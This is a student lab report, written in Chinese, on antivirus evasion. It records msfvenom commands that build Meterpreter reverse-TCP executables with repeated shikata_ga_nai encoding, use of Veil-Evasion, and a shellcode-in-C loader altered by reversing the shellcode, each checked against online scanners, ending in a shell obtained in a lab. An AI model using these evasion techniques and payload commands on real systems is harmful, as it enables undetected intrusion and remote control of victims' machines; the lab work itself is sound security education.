20145238-荆玉茗 《网络对抗》免杀原理与实践

20145238荆玉茗-《网络攻防》-免杀原理与实践

1、基础问题回答

（1）杀软是如何检测出恶意代码的？
答：经过三种方式查杀恶意代码，①基于特征码：检测一段代码；②启发式检测：解决单一的特征码对比的缺陷；③基于行为的恶意代码：监控修改文件硬盘、连网链接恶意网站等。
（2）免杀是作什么？
答：就是不让杀毒软件查出来的厉害病毒。
（3）免杀的基本方法有哪些？
答：①基于特征码：对于有.exe能够加压缩壳；对于shellcode能够用encode编码，对于奇偶位进行分别异或；②能够本身手动编写一个恶意软件；③对于攻击行为：反弹式连接；使用隧道技术。

2、实践总结与体会

• 经过本次实验让我对之前彻底依赖的杀毒软件产生了质疑，连咱们编写的最基本的病毒，有些杀毒软件还查不出来，，，本次实验也让我了解了杀毒软件的工做原理，分析其工做原理编写免杀程序。之前高不可攀的应用现状我也能大概掌握其工做原理，术业有专攻，要想真的做为一名出色的信息安全工做者，那他也必定是一位出色的hacker。

3、离实战还缺些什么技术或步骤？

• 经过杀毒软件检测结果有些编码后的病毒居然查杀率大于病毒自己，就说明咱们一些熟悉的编码早已应用于各类杀软。咱们必须创新出本身的方式。
• 对于查杀率最低的手工打造病毒，对咱们的编程能力以及不少数学、密码等专业知识的要求很高，咱们的水平仍是很是有限。
• 反弹式连接是基础。

4、实践过程记录

1.msfvenom直接生成meterpreter可执行文件

• win10的IP：192.168.2.132
• kali的IP：192.168.228.128

• 在kali中生成meterpreter的可执行文件sos.exe，使用ncat传输至主机。（上次实验传过来的我还没删~就不演示了。）
  

• 使用http://www.virscan.org/网站监测杀软查杀病毒的能力。（注意这里上传的文件不能够以中文及数字开头哦）
  

• 感受我这个不是特别毒，才46%，但这明明就是一个裸毒啊！反正说没有病毒的杀毒软件应该都是假的了。

2.Msfvenom使用编码器生成可执行文件

仅一次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms1.exe

• 再看看他检查的结果（纳尼！比上次直接生成的可执行文件还高，看来这个编译器比源文件被更多的杀软公司标示了...）
  

屡次编码尝试
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms2.exe

• 再来看看检查结果（结果仍是很高，没错说明不少杀毒软件对于编码病毒识别较高）
  

• 对比两次咱们还发现这三次生成的可执行文件的大小都是同样的，只有payload的大小会增长。可能这样不容易被发现。

3.Veil-Evasion生成可执行文件

• 输入use python/meterpreter/rev_tcp
• 输入set LHOST kali的IP
• 输入generate
• 输入生成可执行文件的名字这里是5238sos.exe
• 选python语言编写
• 在它说的位置找到可执行文件

• 找不到位置怎么办cp 复制路径 ~/你能找到的文件夹
  

• 来看看检测结果（效果仍是很是明显的，还有百分之25的杀软检测出来了）
  

4.使用C语言调用shellcode

（手工打造病毒）（不是特别手工）
使用命令生成一个c语言格式的Shellcode数组
*此内容已被删除

• vi建立一个C文件，mssc5238.c，将数组写入文件中，加上主函数。
  *此处省略好多字

• 使用命令该C语言代码mssc5238.c转换为一个可在64位windows系统下操做的可执行文件mssc5238.exe
  

• 检查一下，有8个杀毒软件检测出病毒，是如今作的病毒中最不容易被检测的一个了。
  

采用逆序修改shellcode

• 在windows中vs编写一个C语言程序（参考GQ同窗代码）

• 检测一下（很不错只有四款软件检查出了错误）
  

• 使用金山毒霸扫描一下，也成功躲过
  

• kali中msf成功，获取权限